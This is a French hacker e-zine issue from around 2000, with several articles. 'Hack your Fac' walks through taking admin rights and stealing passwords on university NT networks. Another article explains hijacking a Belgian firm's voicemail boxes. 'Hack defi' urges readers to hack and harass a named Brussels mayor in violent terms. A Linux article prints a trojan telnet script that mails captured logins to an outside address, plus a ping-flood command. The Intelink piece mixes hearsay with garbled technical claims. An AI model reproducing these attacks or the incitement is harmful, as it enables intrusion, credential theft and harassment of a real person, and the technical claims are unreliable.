Quelque adresse qui servent:
<a target="new" href="http://Zone14.cjb.net</a">http://Zone14.cjb.net">http://Zone14.cjb.net</a> C'est mon groupe (pub!)
<a target="new" href="http://protools.cjb.net</a">http://protools.cjb.net">http://protools.cjb.net</a> Tous les outils pour cracker !!!
<a target="new" href="http://www.multimania.com/christalpage/</a">http://www.multimania.com/christalpage/">http://www.multimania.com/christalpage/</a> Le site de +Christal avec plein de
truc sur
les anti-softice...

9)END
£££££
Bon aller on se quitte, mais snif, ne pleurez pas, je reviendrai encore dans le
n°4... Déjà
prévu: Les outils, déboguage avec WDASM, compression + cryptage, structure des
EXE (PE header)
puis ptêt un truc sur les protec commerciales... Sinon, ben bonne chance, et
n'oubliez pas de
lire beaucoup pendant les vacances ;-)... Pour finir, cette petite phrase que je
repique de je
ne sais plus ou: "Ne finissez jamais de commencer à apprendre, et ne commencer
jamais à finir
d'apprendre !"

#EOF CRACKING_BEGINNER n°03 26-06-2000

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


*****************
* Hack your Fac *
*****************

Auteur : Cyrius

ThE HaCkeR CyRiUsViRuS
cyriusvirus@yahoo.fr


Le materiel necessaire est :-Un account sur une becanne de la fac..
-Une becanne avec Unix et/ou NT.. (Si vous
avez pas NT c'est pas la peine...)
-Une legere connaissance des OS..
-Une conscience..

Je vais vous expliquer comment obtenir les acces Admin de votre Fac sous
NT .

I . Le Password Admin Local sous NT
1. Details sur NT
NT est en theorie un systeme d'exploitation beneficiant de la
certification C2. Ce qui signifie qu'il est au plus haut point de
securite possible des OS. J'ai bien dit en THEORIE ;)
Il y a plusieurs composants tres interressants dans NT. Le
LSA(Local Security Authority) qui gere les login et les audits. Le SAM
(Security Account Manager) qui contient les passwords et les donnes au
LSA. Enfin le SRM (Security Reference Monitor) qui genere les messages
d'audits et renforce la securite du LSA.
Qu'est-ce qu'un audit, vous me direz... Un audit et un executable
que l'Admin lance sur certains fichier, programmes ou repertoires, et
qui notte qui a utilise ce fichier et pendant combien de temps.
Il n'y a pas que l'audit qui est tres chiant; y'a aussi les
Service Packs... Ce sont des programmes qui sont crees par MS pour
corriger des bugs dans NT qui pourraient constituer des trous de
securitee. Au jour ou j'ecrit ce texte, le SP4 vient de sortir. Enfin je crois qu'il y a pas si longtemps.

2. Passwords sous NT
Le password est contenu dans un fichier nomme SAM. Ce fichier
existe en plusieurs exemplaires. Celui qui est utilise par NT est le
fichier SAM (ou Sam.log) situe dans le repertoire
WINNT\SYSTEM32\CONFIG\SAM. Le probleme est que ce fichier est utilise
par NT et donc illisible avec NT demarre!!! Mais pas de probleme car NT
est pas intelligent et a peur de le perdre; c'est pourquoi il le
sauvegarde dans un fichier sam.sav. Il existe aussi le fichier Sam_ qui
contient le pass Admin au moment de l'installation mais si l'admin est
pas trop con il l'aura change....

3. Passer Aministrateur sous NT en local
Ca peut etre tres pratique pour installer des progs qui demandent
d'etre Admin...
a) La Solution Getadmin
Pour passer root sous NT il y a plusieurs solutions biensur. La
premiere est d'utiliser un exploit nommé Getadmin.exe. Le probleme est
que cet exploit est patche par le Service Pack 3. Mais mais mais, il y a
toujours une solution, elle se nomme Crash4.exe. Ce dernier programme
est a utiliser si le SP3 est installe sur votre machine, il remet en
place quelques trucs dans la pile de NT et autorise l'utilisation de
Getadmin.exe. Comment savoir si le SP3 est installe? C'est tres simple,
il vous suffit de le copier dans le repertoire c:\temp (vous y avez les
droits ;) avec son DLL GASYS.DLL et executez le en tapant getadmin GUEST
(ou tout autre compte que vous voulez passer en root). Si ca marche pas
de probleme sinon il vous faudra executer Crash4.exe et ensuite
reexecuter Getadmin.
b) L'extraction du fichier Sam
Une autre solution bien plus amusante est de chopper le password
Administrateur. Pour cela on va recuperer le fichier Sam... Le probleme
est que ce fichier est utilise par NT et donc il est innaccessible. Il y
a toute fois une solution. Elle consiste a booter sur une disquette
(donc sous DOS) et de monter la partition NTFS grace a un programme nomme ntfsdos.exe. Ce programme permet de monter la partition
NTFS et donc de pouvoir lire dessus sans aucune restriction habituelle.
On pourra donc recuperer le password Admin et le cracker ensuite. Mais
avant il faut le dumper car il est code. Pour cela il faut utiliser
Pwdump.exe ou Samdump.exe, le fichier est ainsi lisible (mais le pass
est toujours crypte). Une autre solution pour le dumper est d'utiliser
le cracker de passwords L0pthcrack. Vous devrez de toute facon passer
par ce prog car c'est le meilleur cracker de pass NT que je connaisse.
Ca prendra surement du temps mais ca vaut le coup ;)

II . Le password Admin sur le reseau
Pour ce pass faudra gruger un peu (reflechir en bon francais...).
La config de votre reseau est tres importante vous vous en doutez. Le
mieux c'est d'avoir un reseau Ethernet. Plusieurs solutions se
presentent alors a vous : sniffer au moment du login ou sniffer au
moment de la recuperation des mails.
Pour sniffer au login rien de plus simple, il vous suffira d'utiliser
encore une fois L0phtcrack. Le dernier en date, le 2.51 l'integre
graphiquement. c'est trop fun non??? Alors vous le lancez et vous
attendez. Perso je n'ai pas teste la derniere version mais dans les
versions precedentes leur prog readsmb marche tres bien, on peut donc
esperer qu'ils n'ont pas regresse... Le probleme de ce systeme est que
l'on devra cracker quand meme les pass. En effet, NT transmet les
passwords sur le reseau (de la station vers le serveur) mais ce con les
transmets cryptes... Ceci dit c'est deja pas mal et ca peut etre
extremement pratique!!!
La deuxieme solution est si vous avez un serveur de mail de
sniffer les echanges avec ce serveur. Le service POP3 de NT n'est pas
securise et les pass sont transmis sans etre codes ;) et la on se marre
reellement mouahahahah. Installez le sniffer entre le serveur NT et le
serveur de mails... Et voilou. Pour cela je ne saurais trop vous
conseiller le programme sniffit qui tourne sous Unix et qui est a mon
avis Le meilleur sniffer existant. Testez le et vous verrez.
Bien sur si l'admin n'est pas trop CON, vous n'aurez jamais sont
pass meme en crypte (faut pas rever quand meme). Ceci dit les admins sot
parfois tres cons!

Attention ne revez pas, ce n'est pas fini. Car si vous voulez
reellement le password Administrateur (petit defi perso), il vous faudra
utiliser par exemple (encore une fois) L0phtcrack. ET OUI!!! Pour ce
faire vous devrais, avec des droits admin normalement, modifier dans la
base de registre une variable pour pouvoir par la suite recuperer tous
les passwords de votre reseau. La cle est
HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName . Vous devrez
mettre le login Administrator dans votre langue ( vue qu'on est
francophones : Administrateur). Une fois que vous aurez fait cela vous
pourrez dumper la base de registre. Pour cela une option est presente
dans le menu tools :Dump password from registry.
Et la le miracle de Microsoft se revele a vous... La liste complete des
passwords (a cracker bien sur mais ...). Au fait si votre version de NT
est en Anglais pas besoin de sniffer!!! Heureusement que je vous le dit
hein!!!

Donc voila, je crois bien que j'ai fini. J'espere ne pas vous
avoir trop fait chier en racontant toutes ces conneries et j'espere
surtout que ca vous servira bien. Faites bien chier tous ces cons
d'administrateurs NT.



\ _:// \\:_ /
_)\\//(_ _)\\//(_
---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ----------
|||||| 2000 ||||||
'||||' '||||'
CyriuSoft (c)

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



**************************
* Vidage de la pile CMOS *
**************************

Auteur : tRaSH

-vidage de pile CMOS : Ouah, j’en reviens pas je viens de sauver mon pc de
la casse ! J’avais déjà des
problèmes avec (carte son qui marche une fois sur 5, destruction de LILO sans
raison, ) mais a ce point, jamais.
J’installais les drivers pour ma carte son et quand il redémarra (il ne sait pas
le faire seul, il faut appuyer
sur «reset » sinon il bloque) l’écran du BIOS avait change OK, jusque là, ca
va. Mais les choses se corsèrent
quand le démarrage se bloqua sur checking nvram.
Plus moyen de démarrer, il bloquait au niveau du BIOS. Pas moyen de :
parvenir au BIOS, lancer linux ou
windoze même avec une diskette de boot, après une journée a réfléchir, j’ai
pense à une astuce, retirer la pile
du CMOS, pile qui garde tous les paramètres du BIOS une fois le PC éteint. Cette
pile se trouve sur la carte mère,
pour l’enlever, j’ai du enlever 2-3 cartes PCI. Elle ressemble à une pile
normale (en fait, c’est une pile comme
toute les autres, une pile cr2032, mais oui, les grosses rondes, plates) et se
trouve souvent a cote des ports PCI.
Il faut empêcher un des deux pôles de toucher les contacts. Et voilà, le BIOS
est revenu à sa config par défaut,
il faut juste tout reparametrer. Avantages : plus de password, plus de
bugs,Inconvénients : tout reconfigurer,
parfois ça ne marche pas : il se peut que le BIOS soit partiellement ou
entièrement détruit, alors il faudra le
reflasher avec un diskette.
Souvent, on trouve sur les sites de fabriquants des progs a placer sur diskette
pour flasher son BIOS. Attention,
flasher un BIOS n’est pas chose facile. Si vous ne savez toujours pas démarrer
(plus de BIOS du tout), il vous
faudra alors trouver qqn qui a à peu près la même carte mère que vous, lui
emprunter son BIOS (en prenant son
EEPROM BIOS) afin de la mettre [provisoirement] dans votre bécane.
OK, votre bécane a démarrée, et après votre copain est dans la merde car il a
plus de eeprom ok, activez l’option
« cache system bios » dans le bios (celui du copain) et une fois démarrer votre
bécane, enlevez le bios du copain
pour le remplacer par le vôtre (le tout casse), vous pouvez alors le flasher, le
configurer, a oui, dernier conseil,
n’oubliez pas de rendre l’eeprom a votre copain !
Ch’tite question : que veut dire BIOS ?
Ch’tite réponse : basic input/output system

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



*************************************
* Mode d'emploi de la VMB Igloo Ola *
*************************************

Auteur : nada

Cet article etait en fait un email envoye par nada à Asmodeus pour expliquer le
fonctionnement de la VMB.

Je vais t'expliquer le fonctionnement détaillé de cette VMB qui est bien
belge. Il y en a certaines
qui sont en français, d'autres en flamand et certaines en anglais.

N° de téléphone : 0800/99707 (igloo-ola, service consommateur)
Si c’est un répondeur (welcome bij igloo ola...) c’est bon, on continue. Si
c’est quelqu’un qui parle (allo ?)
c’est pas bon, il faut réessayer plus tard. Donc, si c’est un répondeur, on
appuie sur *. Une femme parle, on appuie
sur #. Là, ça demande un n° de boîte vocale. Ceux-ci sont en quatre chiffres. Si
on tombe sur une boîte déjà occupée
(ça dit un nom) alors faut essayer un autre n°, le but étant de créer une boîte
bien à nous. Si quand on a donné le n°,
ça nous explique ce qu’est un service de messagerie, c’est bon, on a réussi a
trouvé un nouveau n° qui n’était pas
encore attribué.
Malheureusement, certaines boîtes sont en néerlandais, c’est pour ça que
j’explique le fonctionnement détaillé de la
boîte. Là, elle va demander le mot de passe temporaire. C’est toujours le n° de
la boîte (sauf boite 9999 et 9998,
ils ont changé :( ) (ex : boîte 5555, mot de passe provisoire : 5555). On le
tape puis on appuie sur #. Maintenant
elle demande que l’on donne un nouveau mot de passe. On le tape puis on appuie
sur #. Puis elle demande notre nom,
on le dit puis sur # comme d’habitude. Après elle nous demande des options dont
on a rien a foutre pour l’instant
(ce qu’on veut c’est créer une boîte) donc on dit qu’on veut garder le message
du système. Maintenant, elle nous
dit un truc dans le genre : « vous n’avez pas de nouveau message ».
GENIAL ! ! !, on a notre boîte à nous tout seul !
Voici les options une fois qu’on est dans la boîte.

1 : écouter les nouveaux messages (si il y en a)
pendant qu'on écoute le message, on a des options qui peuvent être pratique dans
le cas où le mec articule pas!
1 : reculer de 10 secondes dans le message
2 : pause (rappuyer sur 2 pour continuer)
3 : avancer de 10 secondes
4 : aller moins vite :très pratique ;)
5 : renseignement sur le message
6 : aller plus vite
7 : volume moins élevé
8 : volume normal
9 : volume plus élevé
on écoute puis après on a comme choix
7. effacer le message
8. répondre au message
9. archiver le message
0. plus d’options
4. réécouter le message
5. renseignements sur la provenance du message et l’heure
*. annuler
2 : envoyer un message là elle parle et après le bip il faut dire son
message puis appuyer sur #. Ensuite il faut
donner le numéro de la boîte à laquelle on veut envoyer le message puis sur #
pour l’envoyer immédiatement. A la place
on peut appuyer sur 0 pour des options avancées :
0. options avancées.
1. ajouter la mention confidentiel au message
2. ajouter la mention urgent au message
3. obtenir la confirmation du message
4. exiger une transmission différée.
* annuler destination
3 : contrôle des messages envoyés à une certaine personne (c’est pour savoir si
elle a bien écouté tous nos messages)
4 : options personnelles :
1.fonction d’avis de message ON/OFF
2.gestion
1.établir ou modifier des mots de passe.
2.établir ou modifier des listes de distribution de groupe
3.changer le niveau du menu guide.
3.message d’accueil
1.modifier le message d’accueil personnel
2.créer un message détaillé d’absence prolongée
3.enregistrer son nom.
4.option d’appel
1.établir le 1er horaire.
2.établir le 2ème horaire.
3.établir un horaire provisoire.
5 : redémarrer la session
6 : non attribué
7 : non attribué
8 : écouter le n° de notre boîte vocale
9 : fonction du responsable du système :
1.message à diffusion générale du système
2.message d’accueil du système.
3.message de fin de session du système.
4.attribuer un nom à des listes de diffusion ou en créer une nouvelle.
5.affecter un nouveau nom à un point nodal


Le zéro (0) sert toujours soit à faire répéter soit à demander des
explications.
L’étoile (*) sert toujours à revenir en arrière à annuler ou à quitter.

Trucs pour trouver un numéro de boîtes :

-ils sont en quatre chiffres. La femme nous prévient si on s’est trompé
après 3 chiffres. Exemple :
je tape 632 et elle dit numéro incorrect, je peux donc supprimer toutes les
boîtes de 6320 à 6329 inclus. Simple non ?
Pour ne pas devoir recommencer à chaque fois après 3 numéros de boîtes invalides
consécutifs, il suffit d’introduire
un numéro de boîte qui est valide après 2 essais et de taper * quand elle
demande le mot de passe. Ainsi on peut
recommencer sans se faire raccrocher au nez. Quand on tient un bon numéro (la
femme nous explique ce qu’est une boîte
vocale), pour aller plus vite, il suffit de taper le numéro de la boîte vocale
suivi du # puis le nouveau mot de passe
suivi du # puis ça fait bip, donc on dit son nom et on appuie 2 fois sur # pour
confirmer. Après on appuies sur 1
sur # puis sur 2. Voilà, on a créé la boîte vocale.
En résumé, ça fait : Numéro de la boîte
mot de passe provisoire #
Nouveau mot de passe
Bip : nom # #
1 # 2

La boite de Nada : 6415
La boite d'Asmodeus : 6729
La boite de GrIMA : 6754
Voici des numéros de boites :
6270
6280
6394
6399
6338
6202
6201
6729 ---> la mienne <----
6669
6397
6458
6433
6415 ---> Nada <---
Je sais pas si ils marchent encore tous parce que j'avais tellement foutu
le bordel qu'ils ont tout
réinitialisé mais bon, il y en a qui marche, c'est sûr. Amuse toi bien.
@+ nada

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


********************
* Les codes-barres *
********************

Auteur : CyriusVirus

Me revoila. Cet article a pour but de vous apprendre a cracker les codes barres a 13 chiffres qui sont les plus utiliser en Europe.
Tout d'abord, un code barre ne contient pas le prix du produit mais un numero qui qui fait reference au produit
Bons voyons voir comment sont codes ces codes barres (je part du numero completement a gauche) :

0 a 1 : origine du produit
2 a 11 : le code du produit
12 : le checksum


Le checksum se calcul facilement :
A=somme des chiffres en position paire (le chiffre a l'extreme gauche est le numero 0).
B=somme des chiffres en position impaire*3

checksum= 10- [(A+B) mod 10] ou 0 si [(A+B) mod 10]=0


Un chiffre est representer par 7 barres, il s'agit biensur de son ecriture binaire (noir=1 blanc=0).
Cepandant, il ne suffit pas de traduire directement les chiffres en binaire puis de les afficher sous forme de barres (sinon pas besoin de 7 barres 2^7=128).
En effet , ils sont codes sinon ca serait trop simple.

Un code barres presente 2 parties separees par 5 barres plus longues que les autres, elles apparaissent apres le numero 6 (a partir de 0), il y a egalement des barres plus longues sur les cotes du code barre, voici comment elles sont codees :

COTES: 101 {Tout cela en binaire}
CENTRE: 01010
Ces barres sont importantes car elles permettent de calibrer le scanner. de plus, il doit y avoir un espace blanc de 10 fois la taille d'une barre sur chaque cotes du codes barres (c'est important).

Quqnt aux chiffres, il ya 3 tables pour les coder. Sur la moitie droite, tous les chiffres utilisent la table C
Sur laa moitie gauche, les chiffres sont codes avec la table A et B selon une configuration determinee par le chiffre en position 0.
Voici les tables:

TABLE A TABLE B TABLE C
0: 0001101 (13) 0100111 (39) 1110010 (114)
1: 0011001 (25) 0110011 (51) 1100110 (102)
2: 0010011 (19) 0011011 (27) 1101100 (108)
3: 0111101 (61) 0100001 (33) 1000010 (066)
4: 0100011 (35) 0011101 (29) 1011100 (092)
5: 0110001 (49) 0111001 (57) 1001110 (078)
6: 0101111 (47) 0000101 (05) 1010000 (080)
7: 0111011 (59) 0010001 (17) 1000100 (068)
8: 0110111 (55) 0001001 (09) 1001000 (072)
9: 0001011 (11) 0010111 (23) 1110100 (116)

(dans la table A, 0 correspond a 13, dans la B 0 a 39...)

Voila la facon d'utiliser les tables pour la premiere
moitie du code barre en fontion de la valeur du numero 0 ( la seconde moitie est code avec la table C):

#1 #2 #3 #4 #5 #6
0 A A A A A A
1 A A B A B B
2 A A B B A B
3 A A B B B A
4 A B A A B B
5 A B B A A B
6 A B B B A A
7 A B A B A B
8 A B A B B A
9 A B B A B A


Bon, pour ceux qui comprenne toujours pas voici un exemple :

Le code barre est : 9782501 02186 9<--checksum

Calculons le checksum:

somme des chiffres en position paires=9+8+5+1+2+8=33 (il ne faut pas calculer le dernier qui est le checksum!!)

somme des chiffres en position impaires=7+2+0+0+1+6=16
on calcul (33+16*3) mod 10=1 (mod 10 revient a faire une division et prendre la reste comme resultat)
d'ou checksum= 10-1=9 donc c'est bon.
De plus,le numero 0=9 donc les chiffres 782501 sont codes comme ce ci : ABBABA et les autres utilisent la table C.
Oui,Oui je sais que c'etait difficile pour ceux qui n'ont jamais fait l'umaniter ou la 6eme pour les francais.

Voila vous avez appris le fonctionnement des codes barres. Je trouve que c'est plutot cool.
Sachez qu'il existe d'autres type de code barre que je connais pas encore.



Outro
Le moment est venu de faire des greetings. Alors je commence (ca
sera pas long) par Asmoseus qui m'encourage toujours pour faire des articles.
Grim@ et tout les autres membres de BHZ.

FUCK WHIS THE BEST DIE LIKE THE REST :-))))))

[ND Asmodeus][ And stop watching shit moviez aussi hein Cyrius... ]





\ _:// \\:_ /
_)\\//(_ _)\\//(_
---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ----------
|||||| 2000 ||||||
'||||' '||||'
CyriuSoft (c)

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



**************
* L'Intelink *
**************

Auteur : nada

-l’Intelink : qui connaît l’Intelink ? Je crois que pas beaucoup de gens
(en dehors de la CIA) connaissent
l’Intelink (moi-même le connaît depuis que je suis tombé sur une demo sur le
site www.topsecretnet.com, c’est à dire
pas longtemps). Et pourtant, c’est quelque chose de très grand ! Pour vous faire
une idée, c’est une sorte de 2eme
internet, un intranet gigantesque réservé au militaire et au gouvernement
américain (pour changer) contenant des
millions d’informations sur tout : guerre, terrorisme, personnel, Pour y
accéder, il faut travailler dans le
gouvernement ricain, a n’importe quelle échelle : flics comme sénateurs y ont
accès.
Anecdote : Monica Lewinsky y a eu accès en tant que «top Secret/SCI » Sensitive
Compartiment Information,
compartiment d’informations sensible : c’est le plus haut niveau que l’on peut
atteindre et c’est en étant comme
secrétaire a la maison blanche qu’elle l’a atteint (entre deux relations
presidentielles ?). L’Intelink est, comme
le net, base sur du tcp/ip et est fait comme internet : avec des serveurs
(tournant sous apache,... ), un browser,
même des acomptes FTP, un vrai internet autonome. Et oui, il est coupe du net,
aucun contact (enfin, c’est ce que
les sites disent, peut-être que). Pour y avoir accès, il faut accéder à une
borne (emprunte digitale et tout et tout)
ou connaître le numéro du serveur ainsi que les pass, extra-securisé mais
hackable (nul n’est parfait !) Ce qu’il
faudrait, c’est trouver qq. Qui se connecte et lui voler la connexion
(beige-box), mais APRES disons 15 a 20 minutes
car il y a plusieurs niveaux d’identifications, pas intérêt a tomber à ce moment
là.
Point de vue technique :
protocole : tcp/ip, FTP, telnet,
Langage : html
Réseaux : SPIRNet, JWICS, a peu près tous les réseaux de la sécurité
Moteur de recherche : 6 : AltaVista, FBIS, par Meta-Search , Slick, Webinator,
Wer’zit
Identification : two-way
challenge/response : identification simultanée du serveur et du Client
Carte PCMCIA : contenant des infos (niveau d’accès, nom, identification,...)
hautement cryptes (pas un XOR de mes
couilles, quoi). Le cryptage est constitue par une puce Capstone/Keystone qui
inclut les algorithmes DSS, SHA-1,
SES et le KEA.
(DSS=digital signature Standart, SHA-1=secure hash algorithm, SES=Skipjack
encryption standart, KEA=Key
exchangeAlgorythm.
Le tout constitue le Fortezza. A peine le fortezza sortis, on parle déjà du
fortezza plus. Pour activer
la carte, il faut entrer un code Pin de 12 chiffres. ARGH
Restriction : end-to-end confidentiality : niveau d’accès diffèrent d’un
utilisateur a l’autre, un peu comme un
FTP où un root n’a pas les même droit qu’un anonyme
Chat : et oui, il y en a où on ne parle que de guerre, stratégie,
Comme vous pouvez le constater, c’est pas rien et completement coupe du net pas
de passerelle, RIEN !NADA !
Voilà a peu pres tout ce que je sais en la matiere, faut dire que la NSA ne
laisse pas beaucoup filtrer ses
infos et tout est garde secret dans leur ville (avec leur usines, bouffe,...) Au
fait, la devise de la NSA ne
serait-elle pas «servir en silence » ?

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


*************
* Hack defi *
*************

Auteur : tRaSH

J'organise peinard un meet avec Asmodeus (www.thebhz.org ;-))et vient la
question du lieu ! Je pense a
Bruxelles avec ses gares, trams, bus, metros, et en plus c'est la capitale de
l'Europe et de la Belgique. Je me
renseigne et j'apprend que les rassemblement de plus de 3 personnes sont
interdits...
Comment ca interdit ? C'est le retour du faschisme au pouvoir ou quoi ? En
fait, le bourgmestre de
bruxelles ville (Baudouin xavier de donnea) a interdit les rassemblements de
plus de 3 personne. Attention, il ne
faut pas confondre personnes et personnes, un groupe de 25 touristes Japonais
seront accepte avec tout les honneurs
par contre un "rassemblement" de 4 personnes d'un nationalite qui ne plait pas
aux flics (souvent des personnes
d'origine immigres) seront controles (papiers, ...) puis enmene au comissariat
de police le plus proche ! Je les
ai vus a l'oeuvre, c'est pas rien ! leurs controles" sont assez.....agites !
En bref, la politique de donnea est simple : enfermer les elements
"salissant la ville" selont ses propos.
En clair tout ce qui n'est pas Belges, ne possedant pas un appareil photo et
etant a 6/7 sera controle par les flics.
C'est du faschisme pur et dur !
Les flics de bxl ne sont pas mieux, l'Euro 2000 a ete une bonne occasion de
lacher tout le faschismeet la violence
qu'ils ont en eux, tout en accusant les hooligans ils ont pus taper tout ce
qu'ils voulaient pour se defouler.
On peut croire que je delire mais c'est vrai, la preuve que ca gene les flics
que certaines personnes s'en rendent
compte : j'en parlait peinard avec un pote (on etait dans un centre commercial)
et ont est passes devant une sorte
de petite case-a-flics où un keuf narrait ses exploits avec son costume de
Robocop (mais oui, les 2 milliards
d'investis, c'etait principalemnt pour ca) et nous a entendus. On continue et
(ont tournait un peu en rond dans
le centre commercial) se retrouve devant nous (dans le même sens de marche). Il
s'arrete net dés que je dis 2
milliards (LE chiffre fatidique) et me devisage. Je continue et il fait semblant
de rien en regardant une vitrine
...ok.
Dés qu'il arrive derriere nous, il recomence a marcher en nous suivant
pendant au mois 50 metres (a peine
discret, le bourin koi...)on sort du centre et ont va s'assoir un peu plus loin
sur un rebord juste derriere un
coin ou il sufisait que je penche la tête pour voir l'entree du centre
commercial. Il est reste là pendant 15
minutes a nous regarder (ne pouvant rien faire puisque son devoir etait de
rester DANS le centre commercial et
ne pouvant pas effectuer d'arrestaion en dehors), ont a trace a l'oppose pour
pas se faire choper. bref, il
essayait de nous filer pour nous choper mais a foire ! En bref, les flics
n'aiment pas trop que l'on se rendent
compte du fin fond de l'histoire et preferent que les hooligans soit tenus pour
responsable de tout ce bordel...
Tiens, simple question, que vont-ils faire des tenues robocop et de leur
lance-grenade fumnigene, ne risquent on
pas de les retrouver dans des manif' (par le plus grand des hasards) ? Alors,
hack donnea est une operation que
j'ai lance, le but est de faire chier a max de donnea par tout les moyens :
hack, phreak, ...
Il faut qu'il en chie a MORT !
Le gagnant sera recompense par...rien a part la satisfaction d'avoir fait chier
un connard, faschiste.
A vos armes, prêt, FEU, DESTROYEZ LE, QUE SA MAISON EXPLOSE, QUE SA FEMME
DIVORCE, QUE SON CHIEN SE FASSE ENLEVER, ...
debut de l'opperation : 10 septembre 2000, jusque là, envoyez nous les infos que
vous avez sur lui.
nom : De Donnea
prenom : Baudouin Xavier
Bourgmestre de Bruxelles

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


*******************************
* Securiser son systeme Linux *
*******************************

Auteur : Asmodeus

Cet article va tenter de decrire les differents types d'attaque que votre systeme peut subir et les differentes manieres de s'en proteger. En gros, un attaquant peut avoir les deux objectis suivants : soit s'introduire dans le systeme (une intrusion) soit le faire planter.
L'intrusion : l'attaque n'a pas besoin d'etre tres sophistiquee quand l'attaquant a acces à un hote mal configure ou configure par defaut. Avec un simple scanneur de ports si il voit que, par exemple, votre port ftp est ouvert, il pourra tenter de se connecter là dessus avec les comptes root, guest, test, satan, etc... La premiere protection consiste donc à choisir des mots de passe qu'un attaquant ne purra decouvrir en devinant ou en se servant d'un dictionnaire.
Attaque par des programmes : un attaqsuant peut se servir d'un programme pour avoir acces à votre systeme.
Le moyen le plus courant actuellement c'est de provoquer des buffer overflows (depassement de tampon) : des qu'un programmeur oublie de fixer une limite superieure aux donnees entrantes dans son programme.
Une autre facon de se faire hacker c'est d'attribuer des autorisations qui ne conviennent pas : par exemple autoriser un fichier à etre execute avec le bit SUID alors que tous les utilisateurs peuvent y ecrire.
De nombreux programmes sont vulnerables. Consultez les sites http://www.rootshell.com, http://www.security-focus.com, http://www.cert.org, etc... pour des explications sur les faiblesses des programmes et des conseils pour les securiser.

Les programmes cheval de Troie : j'ai dejà explique dans BHZ Mag n° 4 comment, en modifiant le PATH dans le login ou dans le fichier .profile on pouvait recupere le mot de passe d'un utilisateur.
Extrait de l'article :
Par exemple un etudiant ouvre une session sur son compte puis quitte son poste. C'est la que le hackeur arrive : il a acces au compte du branleur.Sans connaitre le mot de passe mais
sachant que la victime est un etudiant.Le hackeur peut modifier le PATH dans le login ou dans le fichier .profile du branleur:

PATH=/usr/bin:/bin:/usr/local/bin:/sbin:/usr/bin:/usr/local/bin:/usr/X11R6/bin

Apres ce changement la commande PATH est executee dans le premier repertoire.
Si la commande est introuvable,le processus mis en place cherche dans le
repertoire suivant...Maintenant reflechissons un peu : il suffit de creer un
script,l'appeler telnet et l'inserer dans le reprtoire home de la victime.
Script qui permettrait d'avoir le mot de passe de la victime/branleur.Apres
avoir cree ce fichier,il faut fermer la session sans que personne ne s'en
rende compte (evitez de faire ca sur le poste a cote de l'admin...) Voici donc
un exemple de script cheval de Troie:

#! /bin/sh
#Trojan Telnet by Asmodeus session
echo "Trying $1...."echo "Connected to $1."echo "Escape character is /'^]\',"
echo " "
echo "Linux 2.0.34."
echo " "
echo $1login: "
read ID
echo "password: "
read PW
echo "Login incorrect."
echo "User $ID ands password $PW" | mail asmodeus@mail.be
rm $0
kill -9 $PPID

Ce script ressemble au programme reel (sauf qu'il ne boucle pas trois fois
parce que j'ai pas envie de me faire chier..);le bete utilisateur croit que
c'est le vrai programme,le programme(le faux) m'envoie le nom et le mot de
passe par e=mail puis le programme se suicide...(rm $0) et tue aussi son
processus (suicide collectif ;=) ) (kill -9 $PPID).

Afin de reperer facilement les programmes cheval de Troie, utilisez Tripwire (http://www.visualcomputing.com)

Les backdoors : j'ai aussi ecrit un article là dessus dans BHZ Mag n°4, je ne repeterai pas la dessus, ces programmes servent, une fois connecte en tangt que root à laisser un moyen de se reconnecter par apres en root.

Les denials of service : les attaques de type denial of service (DoS ou DDoS) visent à provoquer un plantage de l'hote. Des qu'un port est ouvert, cela signifie que l'on poeut vous attaquer là dessus. Par exemple :
# ping -f micrososft.com 80
Cette commande va pinger le serveur microsoft.com sur le port 80 mais comme ce type d'attaque est en faite un envoi en masse de paquets de donnees, il n'est pas tres difficile de repere l'attaquant en verifiant les logs. Une autre facon d'utiliser les DoS serait de repandre un programme parmi des milliers d'utilisateurs, programme qui s'executerait à un moment precis sur toutes les machines et effectuerait la commande ping. Ainsi l'attaquant en question n'aurait meme pas besoin d'utiliser la commande et les personnes ayant utilise eux cette commande à leur insu seraient beaucoup plus nombreuses.

Les daemons : ce sont des processus executes en taches de fond par root. Ils sont souvent la cible des attaquants. C'est pour ca qu'il faut veiller à ne garder que les daemons essentiels au bon fonctionnement du systeme. le nom d'un daemon est souvent "nom du protocole+d" (exemple : le daemon ftpd utilmise le protocole ftp).

Analyse des ports : c'est generalement une des premieres etapes pour un hackeur que de tester les ports ouverts sur un hote distant. nmap sert à analyser les ports, il utilise le fichier /etc/services.

Desactivation de certaines commandes : des commandes comme rlogin, rsh et rcp sont inutiles car elles peuvent etre remplacees par d'autres, notamment SSH (Secure Shell).

Afin d'etre toujours au courant des failles de securite de logicielos, je vous conseille de vous abonner à des mailing-lists (listes de diffusion) concernant la securite des systemes UNIX ou Linux.

Cryptographie : comme cela fait partie du theme de cet article, je vais en parler un peu : il existe deux methodes de cryptographie : cryptographie à cle symbolique (les deux personnes ont la meme cle) et cryptographie à cle publique (la cle est divisee en deux parties). PGP et Secure Shell utilisent tous les deux les cles symboliques comme methode de cryptage.
Les fichiers journaux : si vous avez des doutes à propos d'une intrusion ou autre chose, verifiez les fichiers suivants : /var/adm/messages/ et /var/adm/syslog/.

